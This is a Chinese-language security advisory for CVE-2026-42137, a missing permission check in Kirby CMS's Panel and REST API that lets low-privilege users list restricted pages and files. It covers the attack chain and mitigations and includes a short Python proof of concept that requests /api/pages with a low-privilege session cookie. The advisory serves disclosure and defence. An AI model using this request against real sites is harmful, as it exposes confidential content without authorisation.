CVE-2026-42137 CVSS 6.5 中危

CVE-2026-42137 Kirby CMS权限绕过漏洞

披露日期: 2026-05-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42137

漏洞类型

访问控制失效

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kirby CMS

漏洞概述

Kirby CMS在4.9.0和5.4.0版本之前存在权限校验缺失问题。系统未在Panel和REST API中一致性地检查`pages.access/list`和`files.access/list`权限。低权限攻击者利用此漏洞可列出受限页面或文件，导致敏感信息泄露。

技术细节

该漏洞是由于Kirby CMS在实现访问控制机制时的逻辑疏忽造成的。在受影响的版本中，当用户通过Panel界面或REST API端点请求资源列表时，后端未能严格验证用户是否具备`pages.access/list`（页面列表访问）和`files.access/list`（文件列表访问）的权限。攻击者只需拥有一个低权限账户，即可通过网络发送特制请求，绕过权限检查直接获取系统内部页面的结构信息或文件索引。虽然该漏洞不影响系统的完整性和可用性，但严重破坏了数据的机密性，允许未授权用户窥探受限内容。

攻击链分析

STEP 1

步骤1

攻击者识别目标站点使用的是Kirby CMS，并注册或获取一个低权限用户账号。

STEP 2

步骤2

攻击者使用该账号登录，获取有效的会话Cookie或认证令牌。

STEP 3

步骤3

攻击者构造HTTP请求访问REST API中的敏感端点（如/api/pages或/api/files），尝试列出资源。

STEP 4

步骤4

由于权限校验缺失，服务器返回了本该受限的页面列表或文件列表，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "http://target-kirby-site.com"
endpoint = "/api/pages"

# Attacker's low-privilege session cookie
# Replace with a valid session token obtained after login
cookies = {
    "kirby_session": "attacker_low_priv_session_token_here"
}

# Send request to list pages (bypassing permission check)
response = requests.get(f"{target_host}{endpoint}", cookies=cookies)

if response.status_code == 200:
    print("[+] Exploit successful! Leaked page data:")
    print(response.text)
else:
    print("[-] Exploit failed or already patched.")

影响范围

Kirby < 4.9.0

Kirby < 5.4.0

防御指南

临时缓解措施

若无法立即升级，建议在应用防火墙（WAF）或反向代理层面对`/api`路径实施严格的访问控制，限制仅允许特定IP访问管理接口。同时，应定期审查系统日志，监控是否存在异常的资源列表访问行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表